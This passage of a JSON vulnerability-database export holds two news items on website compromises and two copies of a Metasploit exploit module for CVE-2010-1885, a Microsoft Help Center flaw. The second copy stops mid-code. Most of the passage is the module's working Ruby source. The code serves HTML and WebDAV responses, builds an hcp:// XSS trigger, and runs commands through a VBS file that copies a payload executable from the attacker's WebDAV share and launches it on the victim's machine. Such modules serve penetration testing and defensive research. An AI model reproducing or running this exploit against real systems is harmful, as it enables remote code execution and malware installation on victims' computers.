"https://threatpost.com/main-php-nuke-site-compromised-050710/73938/", "type": "threatpost", "title": "Main PHP-Nuke Site Compromised", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:35", "bulletinFamily": "info", "cvelist": ["CVE-2006-5820", "CVE-2007-0015", "CVE-2007-5659", "CVE-2007-6250", "CVE-2008-2992", "CVE-2009-0927"], "description": "[](<https://threatpost.com/pbs-website-compromised-used-serve-exploits-092309/>)Some sections of the popular PBS.org Web site have been hijacked by hackers serving up a cocktail of dangerous exploits.\n\nAccording to researchers at Purewire, attempts to access certain PBS Web site pages yielded JavaScript that serves exploits from a malicious domain via an iframe.\n\nThe malicious JavaScript was found on the \u201cCurious George\u201d page that provides content on the popular 
animation series.\n\nA look at the code on the hijacked site shows malicious activity coming from a third-party .info domain.\n\nThe URL serves exploits that target a variety of software vulnerabilities, including those in Acrobat Reader ([CVE-2008-2992](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-2992>), [CVE-2009-0927](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927>), and [CVE-2007-5659](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5659>)), AOL Radio AmpX ([CVE-2007-6250](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6250>)), AOL SuperBuddy ([CVE-2006-5820](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5820>)) and Apple QuickTime ([CVE-2007-0015](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0015>)).\n\nPurewire said the exploit site is part of a malware campaign that includes tens of similar Web sites hosted off of a handful of common IP addresses.\n\nRead [the Purewire blog for more information](<http://blog.purewire.com/bid/20389/PBS-Website-Compromised-Used-to-Serve-Exploits>) on this attack.\n\nA representative for PBS.org tells me the malicious code has been removed from the site.\n", "modified": "2013-04-17T16:39:50", "published": "2009-09-23T22:41:03", "id": "THREATPOST:EF67C4CADC97C245A3B46788F85E3A8A", "href": "https://threatpost.com/pbs-website-compromised-used-serve-exploits-092309/72217/", "type": "threatpost", "title": "PBS Website Compromised, Used to Serve Exploits", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:20:20", "description": "", "published": "2010-06-15T00:00:00", "type": "packetstorm", "title": "Microsoft Help Center XSS and Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1885"], "modified": "2010-06-15T00:00:00", "id": "PACKETSTORM:90666", "href": "https://packetstormsecurity.com/files/90666/Microsoft-Help-Center-XSS-and-Command-Execution.html", 
"sourceData": "`## \n# $Id: ms10_xxx_helpctr_xss_cmd_exec.rb 9518 2010-06-15 05:44:29Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \n# \n# This module acts as an HTTP server \n# \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Microsoft Help Center XSS and Command Execution', \n'Description' => %q{ \nHelp and Support Center is the default application provided to access online \ndocumentation for Microsoft Windows. Microsoft supports accessing help documents \ndirectly via URLs by installing a protocol handler for the scheme \"hcp\". Due to \nan error in validation of input to hcp:// combined with a local cross site \nscripting vulnerability and a specialized mechanism to launch the XSS trigger, \narbitrary command execution can be achieved. \n \nOn IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it \ncan be used to launch the exploit automatically. If IE8 and WMP11, either can \nbe used to launch the attack, but both pop dialog boxes asking the user if \nexecution should continue. This exploit detects if non-intrusive mechanisms are \navailable and will use one if possible. In the case of both IE8 and WMP11, the \nexploit defaults to using an iframe on IE8, but is configurable by setting the \nDIALOGMECH option to \"none\" or \"player\". 
\n}, \n'Author' => \n[ \n'Tavis Ormandy', # Original discovery \n'natron' # Metasploit version \n], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 9518 $', \n'References' => \n[ \n[ 'CVE', '2010-1885' ], \n[ 'OSVDB', '65264' ], \n[ 'URL', 'http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/ADVISORY' ], \n[ 'URL', 'http://www.microsoft.com/technet/security/advisory/2219475.mspx' ] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 2048, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic', { } ] \n], \n'DisclosureDate' => 'June 09, 2010', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptPort.new( 'SRVPORT', [ true, \"The daemon port to listen on\", 80 ]), \nOptString.new( 'URIPATH', [ true, \"The URI to use.\", \"/\" ]), \nOptString.new( 'DIALOGMECH', [ true, \"IE8/WMP11 trigger mechanism (none, iframe, or player).\", \"iframe\"]) \n], self.class) \n \nderegister_options('SSL', 'SSLVersion') # Just for now \nend \n \ndef on_request_uri(cli, request) \n \n# If there is no subdirectory in the request, we need to redirect. \nif (request.uri == '/') or not (request.uri =~ /\\/[^\\/]+\\//) \nif (request.uri == '/') \nsubdir = '/' + rand_text_alphanumeric(8+rand(8)) + '/' \nelse \nsubdir = request.uri + '/' \nend \nprint_status(\"Request for \\\"#{request.uri}\\\" does not contain a sub-directory, redirecting to #{subdir} ...\") \nsend_redirect(cli, subdir) \nreturn \nend \n \n \ncase request.method \nwhen 'OPTIONS' \nprocess_options(cli, request) \nwhen 'PROPFIND' \nprocess_propfind(cli, request) \nwhen 'GET' \nprocess_get(cli, request) \nelse \nprint_error(\"Unexpected request method encountered: #{request.method}\") \nend \n \nend \n \ndef process_get(cli, request) \n \n@my_host = (datastore['SRVHOST'] == '0.0.0.0') ? 
Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] \nwebdav_loc = \"\\\\\\\\#{@my_host}\\\\#{@random_dir}\\\\#{@payload}\" \n@url_base = \"http://\" + @my_host \n \nif (Regexp.new(Regexp.escape(@payload)+'$', true).match(request.uri)) \nprint_status \"Sending payload executable to target ...\" \nreturn if ((p = regenerate_payload(cli)) == nil) \n \ndata = Msf::Util::EXE.to_win32pe(framework, p.encoded) \n \nsend_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) \nreturn \nend \n \nif request.uri.match(/\\.gif$/) \n# \"world's smallest gif\" \ndata = \"GIF89a\\x01\\x00\\x01\\x00\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00!\\xF9\\x04\\x01\" \ndata += \"\\x00\\x00\\x00\\x00,\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x00\\x00\\x02\\x02D\\x01\\x00;\" \nprint_status \"Sending gif image to WMP at #{cli.peerhost}:#{cli.peerport} ...\" \nsend_response(cli, data, { 'Content-TYpe' => 'image/gif' } ) \nend \n \n# ASX Request Inbound \nif request.uri.match(/\\.asx$/) \nasx = %Q|<ASX VERSION=\"3.0\"> \n<PARAM name=\"HTMLView\" value=\"URLBASE/STARTHELP\"/> \n<ENTRY> \n<REF href=\"URLBASE/IMGFILE\"/> \n</ENTRY> \n</ASX> \n| \nasx.gsub!(/URLBASE/, @url_base) \nasx.gsub!(/STARTHELP/, @random_dir + \"/\" + @start_help) \nasx.gsub!(/IMGFILE/, @random_dir + \"/\" + @img_file) \nprint_status(\"Sending asx file to #{cli.peerhost}:#{cli.peerport} ...\") \nsend_response(cli, asx, { 'Content-Type' => 'text/html' }) \nreturn \nend \n \n# iframe request inbound from either WMP or IE7 \nif request.uri.match(/#{@start_help}/) \n \nhelp_html = %Q|<iframe 
src=\"hcp://services/search?query=a&topic=hcp://system/sysinfo/sysinfomain.htm%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27COMMANDS%27%29%29%3C/script%3E\">| \n \nrand_vbs = rand_text_alpha(rand(2)+1) + \".vbs\" \ncopy_launch = %Q^cmd /c copy #{webdav_loc} %TEMP% && %TEMP%\\\\#{@payload}^ \nvbs_content = %Q|WScript.CreateObject(\"WScript.Shell\").Run \"#{copy_launch}\",0,false| \nwrite_vbs = %Q|cmd /c echo #{vbs_content}>%TEMP%\\\\#{rand_vbs}| \nlaunch_vbs = %Q|cscript %TEMP%\\\\#{rand_vbs}>nul| \nconcat_cmds = \"#{write_vbs}|#{launch_vbs}\" \n \neval_block = \"Run(String.fromCharCode(#{convert_to_char_code(concat_cmds)}));\" \neval_block = Rex::Text.uri_encode(Rex::Text.uri_encode(eval_block)) \nhelp_html.gsub!(/COMMANDS/, eval_block) \nprint_status(\"Sending exploit trigger to #{cli.peerhost}:#{cli.peerport} ...\") \nsend_response(cli, help_html, { 'Content-Type' => 'text/html' }) \nreturn \nend \n \n# default initial response \njs = %Q| \nvar asx = \"URLBASE/ASXFILE\"; \nvar ifr = \"URLBASE/IFRFILE\"; \n \nfunction launchiframe(src) { \nvar o = document.createElement(\"IFRAME\"); \no.setAttribute(\"width\",\"0\"); \no.setAttribute(\"height\",\"0\"); \no.setAttribute(\"frameborder\",\"0\"); \no.setAttribute(\"src\",src); \ndocument.body.appendChild(o); \n} \n \nif (window.navigator.appName == \"Microsoft Internet Explorer\") { \nvar ua = window.navigator.userAgent; \nvar re = new 
RegExp(\"MSIE ([0-9]{1,}[\\.0-9]{0,})\"); \nre.exec(ua) \nver = parseFloat( RegExp.$1 ); \n \n// if ie8, check WMP version \nif (ver > 7) { \nvar o = document.createElement(\"OBJECT\"); \no.setAttribute(\"classid\", \"clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6\"); \no.setAttribute(\"uiMode\", \"invisible\"); \n// if wmp9, go ahead and launch \nif( parseInt(o.versionInfo) < 10 ) { \no.openPlayer(asx); \n// if > wmp9, only launch if user requests \n} else { \nDIALOGMECH \n} \n// if ie7, use iframe \n} else { \nlaunchiframe(ifr); \n} \n} else { \n// if other, try iframe \nlaunchiframe(ifr); \n} \n| \n \nhtml = %Q|<html> \n<head></head><body><script>JAVASCRIPTFU \n</script> \n</body> \n</html> \n| \ncase datastore['DIALOGMECH'] \nwhen \"player\" \nmech = \"o.openPlayer(asx);\" \nwhen \"iframe\" \nmech = \"launchiframe(ifr);\" \nwhen \"none\" \nmech = \"\" \nelse \nmech = \"\" \nend \n \nhtml.gsub!(/JAVASCRIPTFU/, js) \nhtml.gsub!(/DIALOGMECH/, mech) \nhtml.gsub!(/URLBASE/, @url_base) \nhtml.gsub!(/ASXFILE/, @random_dir + \"/\" + @asx_file) \nhtml.gsub!(/IFRFILE/, @random_dir + \"/\" + @start_help) \n \nprint_status(\"Sending exploit html to #{cli.peerhost}:#{cli.peerport} ...\") \n \nheaders = { \n'Content-Type' => 'text/html', \n#'X-UA-Compatible' => 'IE=7' \n} \n \nsend_response(cli, html, headers) \nend \n \n# \n# OPTIONS requests sent by the WebDav Mini-Redirector \n# \ndef process_options(cli, request) \nprint_status(\"Responding to WebDAV OPTIONS request from #{cli.peerhost}:#{cli.peerport}\") \nheaders = { \n#'DASL' => '<DAV:sql>', \n#'DAV' => '1, 2', \n'Allow' => 'OPTIONS, GET, PROPFIND', \n'Public' => 'OPTIONS, GET, PROPFIND' \n} \nsend_response(cli, '', headers) \nend \n \ndef convert_to_char_code(str) \nreturn str.unpack('H*')[0].gsub(Regexp.new(\".{#{2}}\", nil, 'n')) { |s| s.hex.to_s + \",\" }.chop \nend \n# \n# PROPFIND requests sent by the WebDav Mini-Redirector \n# \ndef process_propfind(cli, request) \npath = request.uri \nprint_status(\"Received 
WebDAV PROPFIND request from #{cli.peerhost}:#{cli.peerport}\") \nbody = '' \n \nif (Regexp.new(Regexp.escape(@payload)+'$', true).match(path)) \n# Response for the EXE \nprint_status(\"Sending EXE multistatus for #{path} ...\") \n#<lp1:getcontentlength>45056</lp1:getcontentlength> \nbody = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<D:multistatus xmlns:D=\"DAV:\"> \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype/> \n<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate> \n<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified> \n<lp1:getetag>\"39e0132-b000-43c6e5f8d2f80\"</lp1:getetag> \n<lp2:executable>F</lp2:executable> \n<D:lockdiscovery/> \n<D:getcontenttype>application/octet-stream</D:getcontenttype> \n</D:prop> \n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n</D:multistatus> \n| \nelsif (path =~ /\\.manifest$/i) or (path =~ /\\.config$/i) or (path =~ /\\.exe/i) \nprint_status(\"Sending 404 for #{path} ...\") \nsend_not_found(cli) \nreturn \n \nelsif (path =~ /\\/$/) or (not path.sub('/', '').index('/')) \n# Response for anything else (generally just /) \nprint_status(\"Sending directory multistatus for #{path} ...\") \nbody = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<D:multistatus xmlns:D=\"DAV:\"> \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype><D:collection/></lp1:resourcetype> \n<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate> \n<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified> \n<lp1:getetag>\"39e0001-1000-4808c3ec95000\"</lp1:getetag> \n<D:lockdiscovery/> \n<D:getcontenttype>httpd/unix-directory</D:getcontenttype> \n</D:prop> \n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n</D:multistatus> \n| \n \nelse \nprint_status(\"Sending 404 for 
#{path} ...\") \nsend_not_found(cli) \nreturn \nend \n \n# send the response \nresp = create_response(207, \"Multi-Status\") \nresp.body = body \nresp['Content-Type'] = 'text/xml' \ncli.send_response(resp) \nend \n \ndef exploit \n@random_dir = rand_text_alpha(rand(2)+1) \n@asx_file = rand_text_alpha(rand(2)+1) + \".asx\" \n@start_help = rand_text_alpha(rand(2)+1) + \".html\" \n@payload = rand_text_alpha(rand(2)+1) + \".exe\" \n@img_file = rand_text_alpha(rand(2)+1) + \".gif\" \n \nif datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/' \nraise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/' \nend \n \nsuper \nend \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/90666/ms10_xxx_helpctr_xss_cmd_exec.rb.txt"}, {"lastseen": "2016-12-05T22:20:11", "description": "", "published": "2010-07-14T00:00:00", "type": "packetstorm", "title": "Microsoft Help Center XSS and Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1885"], "modified": "2010-07-14T00:00:00", "id": "PACKETSTORM:91768", "href": "https://packetstormsecurity.com/files/91768/Microsoft-Help-Center-XSS-and-Command-Execution.html", "sourceData": "`## \n# $Id: ms10_042_helpctr_xss_cmd_exec.rb 9810 2010-07-13 19:31:40Z hdm $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. 
\n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \n# \n# This module acts as an HTTP server \n# \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Microsoft Help Center XSS and Command Execution', \n'Description' => %q{ \nHelp and Support Center is the default application provided to access online \ndocumentation for Microsoft Windows. Microsoft supports accessing help documents \ndirectly via URLs by installing a protocol handler for the scheme \"hcp\". Due to \nan error in validation of input to hcp:// combined with a local cross site \nscripting vulnerability and a specialized mechanism to launch the XSS trigger, \narbitrary command execution can be achieved. \n \nOn IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it \ncan be used to launch the exploit automatically. If IE8 and WMP11, either can \nbe used to launch the attack, but both pop dialog boxes asking the user if \nexecution should continue. This exploit detects if non-intrusive mechanisms are \navailable and will use one if possible. In the case of both IE8 and WMP11, the \nexploit defaults to using an iframe on IE8, but is configurable by setting the \nDIALOGMECH option to \"none\" or \"player\". 
\n}, \n'Author' => \n[ \n'Tavis Ormandy', # Original discovery \n'natron' # Metasploit version \n], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 9810 $', \n'References' => \n[ \n[ 'CVE', '2010-1885' ], \n[ 'OSVDB', '65264' ], \n[ 'URL', 'http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/ADVISORY' ], \n[ 'URL', 'http://www.microsoft.com/technet/security/advisory/2219475.mspx' ], \n[ 'MSB', 'MS10-042'] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Payload' => \n{ \n'Space' => 2048, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic', { } ] \n], \n'DisclosureDate' => 'Jun 09 2010', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptPort.new( 'SRVPORT', [ true, \"The daemon port to listen on\", 80 ]), \nOptString.new( 'URIPATH', [ true, \"The URI to use.\", \"/\" ]), \nOptString.new( 'DIALOGMECH', [ true, \"IE8/WMP11 trigger mechanism (none, iframe, or player).\", \"iframe\"]) \n], self.class) \n \nderegister_options('SSL', 'SSLVersion') # Just for now \nend \n \ndef on_request_uri(cli, request) \n \n# If there is no subdirectory in the request, we need to redirect. \nif (request.uri == '/') or not (request.uri =~ /\\/[^\\/]+\\//) \nif (request.uri == '/') \nsubdir = '/' + rand_text_alphanumeric(8+rand(8)) + '/' \nelse \nsubdir = request.uri + '/' \nend \nprint_status(\"Request for \\\"#{request.uri}\\\" does not contain a sub-directory, redirecting to #{subdir} ...\") \nsend_redirect(cli, subdir) \nreturn \nend \n \n \ncase request.method \nwhen 'OPTIONS' \nprocess_options(cli, request) \nwhen 'PROPFIND' \nprocess_propfind(cli, request) \nwhen 'GET' \nprocess_get(cli, request) \nelse \nprint_error(\"Unexpected request method encountered: #{request.method}\") \nend \n \nend \n \ndef process_get(cli, request) \n \n@my_host = (datastore['SRVHOST'] == '0.0.0.0') ? 
Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] \nwebdav_loc = \"\\\\\\\\#{@my_host}\\\\#{@random_dir}\\\\#{@payload}\" \n@url_base = \"http://\" + @my_host \n \nif (Regexp.new(Regexp.escape(@payload)+'$', true).match(request.uri)) \nprint_status \"Sending payload executable to target ...\" \nreturn if ((p = regenerate_payload(cli)) == nil) \n \ndata = Msf::Util::EXE.to_win32pe(framework, p.encoded) \n \nsend_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) \nreturn \nend \n \nif request.uri.match(/\\.gif$/) \n# \"world's smallest gif\" \ndata = \"GIF89a\\x01\\x00\\x01\\x00\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00!\\xF9\\x04\\x01\" \ndata += \"\\x00\\x00\\x00\\x00,\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x00\\x00\\x02\\x02D\\x01\\x00;\" \nprint_status \"Sending gif image to WMP at #{cli.peerhost}:#{cli.peerport} ...\" \nsend_response(cli, data, { 'Content-TYpe' => 'image/gif' } ) \nend \n \n# ASX Request Inbound \nif request.uri.match(/\\.asx$/) \nasx = %Q|<ASX VERSION=\"3.0\"> \n<PARAM name=\"HTMLView\" value=\"URLBASE/STARTHELP\"/> \n<ENTRY> \n<REF href=\"URLBASE/IMGFILE\"/> \n</ENTRY> \n</ASX> \n| \nasx.gsub!(/URLBASE/, @url_base) \nasx.gsub!(/STARTHELP/, @random_dir + \"/\" + @start_help) \nasx.gsub!(/IMGFILE/, @random_dir + \"/\" + @img_file) \nprint_status(\"Sending asx file to #{cli.peerhost}:#{cli.peerport} ...\") \nsend_response(cli, asx, { 'Content-Type' => 'text/html' }) \nreturn \nend \n \n# iframe request inbound from either WMP or IE7 \nif request.uri.match(/#{@start_help}/) \n \nhelp_html = %Q|<iframe 
src=\"hcp://services/search?query=a&topic=hcp://system/sysinfo/sysinfomain.htm%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF%uFFFF..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27COMMANDS%27%29%29%3C/script%3E\">| \n \nrand_vbs = rand_text_alpha(rand(2)+1) + \".vbs\" \ncopy_launch = %Q^cmd /c copy #{webdav_loc} %TEMP% && %TEMP%\\\\#{@payload}^ \nvbs_content = %Q|WScript.CreateObject(\"WScript.Shell\").Run \"#{copy_launch}\",0,false| \nwrite_vbs = %Q|cmd /c echo #{vbs_content}>%TEMP%\\\\#{rand_vbs}| \nlaunch_vbs = %Q|cscript %TEMP%\\\\#{rand_vbs}>nul| \nconcat_cmds = \"#{write_vbs}|#{launch_vbs}\" \n \neval_block = \"Run(String.fromCharCode(#{convert_to_char_code(concat_cmds)}));\" \neval_block = Rex::Text.uri_encode(Rex::Text.uri_encode(eval_block)) \nhelp_html.gsub!(/COMMANDS/, eval_block) \nprint_status(\"Sending exploit trigger to #{cli.peerhost}:#{cli.peerport} ...\") \nsend_response(cli, help_html, { 'Content-Type' => 'text/html' }) \nreturn \nend \n \n# default initial response \njs = %Q| \nvar asx = \"URLBASE/ASXFILE\"; \nvar ifr = \"URLBASE/IFRFILE\"; \n \nfunction launchiframe(src) { \nvar o = document.createElement(\"IFRAME\"); \no.setAttribute(\"width\",\"0\"); \no.setAttribute(\"height\",\"0\"); \no.setAttribute(\"frameborder\",\"0\"); \no.setAttribute(\"src\",src); \ndocument.body.appendChild(o); \n} \n \nif (window.navigator.appName == \"Microsoft Internet Explorer\") { \nvar ua = window.navigator.userAgent; \nvar re = new 
RegExp(\"MSIE ([0-9]{1,}[\\.0-9]{0,})\"); \nre.exec(ua) \nver = parseFloat( RegExp.$1 ); \n \n// if ie8, check WMP version \nif (ver > 7) { \nvar o = document.createElement(\"OBJECT\"); \no.setAttribute(\"classid\", \"clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6\"); \no.setAttribute(\"uiMode\", \"invisible\"); \n// if wmp9, go ahead and launch \nif( parseInt(o.versionInfo) < 10 ) { \no.openPlayer(asx); \n// if > wmp9, only launch if user requests \n} else { \nDIALOGMECH \n} \n// if ie7, use iframe \n} else { \nlaunchiframe(ifr); \n} \n} else { \n// if other, try iframe \nlaunchiframe(ifr); \n} \n| \n \nhtml = %Q|<html> \n<head></head><body><script>JAVASCRIPTFU \n</script> \n</body> \n</html> \n| \ncase datastore['DIALOGMECH'] \nwhen \"player\" \nmech = \"o.openPlayer(asx);\" \nwhen \"iframe\" \nmech = \"launchiframe(ifr);\" \nwhen \"none\" \nmech = \"\" \nelse \nmech = \"\" \nend \n \nhtml.gsub!(/JAVASCRIPTFU/, js) \nhtml.gsub!(/DIALOGMECH/, mech) \nhtml.gsub!(/URLBASE/, @url_base) \nhtml.gsub!(/ASXFILE/, @random_dir + \"/\" + @asx_file) \nhtml.gsub!(/IFRFILE/, @random_dir + \"/\" + @start_help) \n \nprint_status(\"Sending exploit html to #{cli.peerhost}:#{cli.peerport} ...\") \n \nheaders = { \n'Content-Type' => 'text/html', \n#'X-UA-Compatible' => 'IE=7' \n} \n \nsend_response(cli, html, headers) \nend \n \n# \n# OPTIONS requests sent by the WebDav Mini-Redirector \n# \ndef process_options(cli, request) \nprint_status(\"Responding to WebDAV OPTIONS request from #{cli.peerhost}:#{cli.peerport}\") \nheaders = { \n#'DASL' => '<DAV:sql>', \n#'DAV' => '1, 2', \n'Allow' => 'OPTIONS, GET, PROPFIND', \n'Public' => 'OPTIONS, GET, PROPFIND' \n} \nsend_response(cli, '', headers) \nend \n \ndef convert_to_char_code(str) \nreturn str.unpack('H*')[0].gsub(Regexp.new(\".{#{2}}\", nil, 'n')) { |s| s.hex.to_s + \",\" }.chop \nend \n# \n# PROPFIND requests sent by the WebDav Mini-Redirector \n# \ndef process_propfind(cli, request) \npath = request.uri \nprint_status(\"Received 
WebDAV PROPFIND request from #{cli.peerhost}:#{cli.peerport}\") \nbody = '' \n \nif (Regexp.new(Regexp.escape(@payload)+'$', true).match(path)) \n# Response for the EXE \nprint_status(\"Sending EXE multistatus for #{path} ...\") \n#<lp1:getcontentlength>45056</lp1:getcontentlength> \nbody = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<D:multistatus xmlns:D=\"DAV:\"> \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype/> \n<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate> \n<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified> \n<lp1:getetag>\"39e0132-b000-43c6e5f8d2f80\"</lp1:getetag> \n<lp2:executable>F</lp2:executable> \n<D:lockdiscovery/> \n<D:getcontenttype>application/octet-stream</D:getcontenttype> \n</D:prop> \n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n</D:multistatus> \n| \nelsif (path =~ /\\.manifest$/i) or (path =~ /\\.config$/i) or (path =~ /\\.exe/i) \nprint_status(\"Sending 404 for #{path} ...\") \nsend_not_found(cli) \nreturn \n \nelsif (path =~ /\\/$/) or (not path.sub('/', '').index('/')) \n# Response for anything else (generally just /) \nprint_status(\"Sending directory multistatus for #{path} ...\") \nbody = %Q|<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<D:multistatus xmlns:D=\"DAV:\"> \n<D:response xmlns:lp1=\"DAV:\" xmlns:lp2=\"http://apache.org/dav/props/\"> \n<D:href>#{path}</D:href> \n<D:propstat> \n<D:prop> \n<lp1:resourcetype><D:collection/></lp1:resourcetype> \n<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate> \n<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified> \n<lp1:getetag>\"39e0001-1000-4808c3ec95000\"</lp1:getetag> \n<D:lockdiscovery/> \n<D:getcontenttype>httpd/unix-directory</D:getcontenttype> \n</D:prop> \n<D:status>HTTP/1.1 200 OK</D:status> \n</D:propstat> \n</D:response> \n</D:multistatus> \n| \n \nelse \nprint_status(\"Sending 404 for 
